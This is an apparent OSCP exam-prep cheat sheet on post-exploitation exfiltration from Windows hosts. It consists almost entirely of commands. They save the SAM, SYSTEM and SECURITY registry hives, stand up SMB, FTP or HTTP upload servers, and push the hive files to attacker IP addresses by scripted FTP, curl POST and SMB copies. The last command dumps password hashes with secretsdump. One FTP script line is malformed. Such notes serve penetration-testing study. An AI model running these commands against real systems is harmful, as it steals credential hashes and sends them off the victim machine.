// notes/ Pivoting & Tunneling
🚀
Exfiltration
Dump the SAM hive to the pwd
#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/exfiltration ↗Exfiltration
Dump the SAM hive to the pwd
code
01reg.exe save HKLM\SAM C:\programdata\sam.bakDump the System hive to the pwd
code
01reg.exe save HKLM\SYSTEM C:\programdata\system.bakDump the Security hive to the pwd
code
01reg.exe save HKLM\SECURITY C:\programdata\security.bakSpin up an smb server
bash
$impacket-smbserver share share/ -smb2supportpowershell
$echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt$ftp -v -n -s:ftp.txtExfiltrate data
code
01python3 -m uploadservercode
01curl -X POST http://HOST/upload -H -F 'files=@file.txt'OR
code
01python -m pyftpdlib -p 21 --writecode
01echo open 192.168.45.237 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txtcode
01ftp -v -n -s:ftp.txtOR
code
01New-SmbMapping -LocalPath A: -RemotePath \\192.168.229.121\share -TcpPort 8888powerquery
01net use "\\192.168.171.121\adot8"02copy sam.bak "\\192.168.171.121\adot8\sam.bak"03copy system.bak "\\192.168.171.121\adot8\system.bak"04copy security.bak "\\192.168.171.121\adot8\security.bak"Dump hashes with secretsdump
bash
$secretsdump.py -sam sam.bak -system system.bak -security security.bak local